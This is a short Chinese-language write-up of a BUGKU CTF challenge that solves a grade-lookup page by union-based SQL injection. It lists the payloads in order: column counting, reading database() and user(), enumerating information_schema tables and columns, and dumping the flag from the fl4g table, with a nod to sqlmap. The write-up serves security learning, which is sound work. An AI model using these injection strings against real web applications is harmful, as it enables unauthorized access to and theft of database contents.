BUGKU CTF (成绩查询)
first 打开题目 就应该了然 这是一题关于SQL注入的
那就好办了 用SQL语言尝试输入 看看会有什结果
union联合查询 0' union select 1,2,3,4#
有正常的回显 说明列数为四 id,Math,English,Chinese 然后 查看数据库
0' union select 1,2,3,database()#
细看一下四个数据的内容 0' union select 1,user(),version(),database()#
在第四列始终是 skctf 那么就看一下它的表
0' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf'#
找到了skctf库中的fl4g表
紧接着是列 0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'#
最后就是 查找列中的值
0' union select 1,2,3,skctf_flag from fl4g#
(可以利用sqlmap 小跑一下呦 (●'◡'●))
小结:
A: # -- - 闭合
B: 库--表--列--值